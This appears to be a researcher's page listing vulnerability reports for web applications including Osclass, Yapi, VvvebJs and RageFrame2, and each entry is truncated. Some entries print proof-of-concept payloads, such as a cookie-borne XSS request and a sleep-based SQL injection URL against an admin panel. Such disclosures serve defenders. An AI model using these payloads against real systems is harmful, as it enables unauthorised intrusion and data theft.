JiaSheng He
JiaSheng He
``` GET /index.php?user/login HTTP/1.1 Host: 192.168.160.130:6699 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: APP_HOST=http://192.168.160.130:6699/">alert(9876) Upgrade-Insecure-Requests: 1 ```...
### Vulnerability report **Description** Attackers can pass malicious URLs as parameters to the pingback.ping method by constructing malicious requests. The first parameter in this method allows passing any URL, and...
### **Summary** Osclass 5.1.2 has a SQL Injection Vulnerability. ### **Details** An attacker with administrator rights can execute commands through SQL injection. ### **Proof of Concept (POC)** ``` GET /oc-admin/index.php?b_active=(select(0)from(select(sleep(4)))v)&b_enabled=0&b_premium=1&b_spam=1&catId=10&city=San%20Francisco&cityId=San%20Francisco&countryId=USA&countryName=hebing123&direction=desc&iDisplayLength=10&page=items®ion=NY®ionId=NY&sSearch=the&sort=date&user=hebing123&userId=hebing123...
# Summary A stored XSS vulnerability exists in Yapi 1.10.2 (2021-10-13) which allows attackers to execute arbitrary HTML code. # Details In the advanced expectation, the user can execute any...
# **Summary** VvvebJs version 1.7.4 exhibits an arbitrary file upload vulnerability. An attacker can exploit this vulnerability to upload malicious files onto the server, potentially leading to the execution of...
### Summary VvvebJs 1.7.4 has a reflective cross-site scripting (XSS) vulnerability. An attacker can execute malicious code in the user's browser by inducing the user to click on a link...
### Summary RageFrame2 2.6.43 has a reflective cross-site scripting (XSS) vulnerability. An attacker can execute malicious code in the admin's browser by inducing the admin to click on a link...
### Summary RageFrame2 2.6.43 has a reflective cross-site scripting (XSS) vulnerability. An attacker can execute malicious code in the admin's browser by inducing the admin to click on a link...
### Summary RageFrame2 2.6.43 has a reflective cross-site scripting (XSS) vulnerability. An attacker can execute malicious code in the admin's browser by inducing the admin to click on a link...
### Summary RageFrame2 2.6.43 has a reflective cross-site scripting (XSS) vulnerability. An attacker can execute malicious code in the admin's browser by inducing the admin to click on a link...